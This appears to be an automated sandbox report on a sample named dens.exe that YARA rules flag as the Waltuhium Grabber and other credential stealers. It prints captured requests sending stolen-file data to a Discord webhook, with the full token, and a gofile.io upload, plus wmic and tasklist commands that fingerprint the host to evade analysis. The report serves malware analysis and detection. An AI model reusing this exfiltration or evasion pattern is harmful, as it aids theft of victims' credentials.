                                                                                                                                                                                                                                            Data Ascii: {"data":{"createTime":1731454743,"downloadPage":"https://gofile.io/d/9x70nq","guestToken":"5YGCB957XjXN9rfDVTnm3cqiX9zYwn40","id":"d6e0a80f-b0db-4c67-a27f-ca141e8c32ab","md5":"2de3905b3c79c3eddf4364ef98ae364a","mimetype":"application/zip","modTime":173145


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.449762162.159.128.2334436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:39:04 UTC281OUTPOST /api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygbrLTztN99jPEX8IcFYc7T HTTP/1.1
                                                                                                                                                                                                                                            Host: discord.com
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 345
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            2024-11-12 23:39:04 UTC345OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 77 61 6c 74 75 68 69 75 6d 20 7c 20 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 57 61 6c 74 75 68 69 75 6d 20 47 72 61 62 62 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 47 72 61 62 62 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 77 61 6c 74 75 68 69 75 6d 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 67 69 74 68 75 62 22 7d 2c 20 22 74 68 75 6d 62 6e 61 69 6c 22 3a 20 7b 22 75 72 6c 22 3a 20 22 77 65 62 68 6f 6f 6b 22 7d 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22
                                                                                                                                                                                                                                            Data Ascii: {"username": "waltuhium | t.me/waltuhium", "embeds": [{"title": "***Waltuhium Grabber***", "description": "***Grabbed Files***", "url": "https://t.me/waltuhium", "color": 0, "footer": {"text": "github"}, "thumbnail": {"url": "webhook"}, "fields": [{"name"
                                                                                                                                                                                                                                            2024-11-12 23:39:04 UTC1251INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:04 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                                            x-ratelimit-reset: 1731454746
                                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ulokEnWGzVdH7hLe7hM6A2vOqkNcE0KE1y65WVc8ZvDwIjhqZcZpQbKPvQF8sheBErrWD8hb%2BJuFHZ01kC0lCIIzTD16gbov3KB0pVTsuTd6CvzTlRvcpVS1Jqp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Set-Cookie: __cfruid=61c4ad02f8e425b2213084f6302794d3bd4541dd-1731454744; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                            Set-Cookie: _cfuvid=tkSDV4PM1uOJpB7hv3ajc8RXfDe2eEs5RpUxYl09GBk-1731454744647-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e1a5bf99b60d5db-DFW
                                                                                                                                                                                                                                            2024-11-12 23:39:04 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:18:38:27
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\dens.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff62c0f0000
                                                                                                                                                                                                                                            File size:16'905'542 bytes
                                                                                                                                                                                                                                            MD5 hash:258322C37F4F5C632BD6C79520899603
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:18:38:30
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\dens.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff62c0f0000
                                                                                                                                                                                                                                            File size:16'905'542 bytes
                                                                                                                                                                                                                                            MD5 hash:258322C37F4F5C632BD6C79520899603
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_WaltuhiumGrabber, Description: Yara detected Waltuhium Grabber, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.2029534944.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "gdb --version"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                            Start time:18:38:31
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:18:38:32
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:18:38:32
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic computersystem get Manufacturer
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:18:38:32
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:18:38:33
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:18:38:33
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:18:38:33
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic path Win32_ComputerSystem get Manufacturer
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
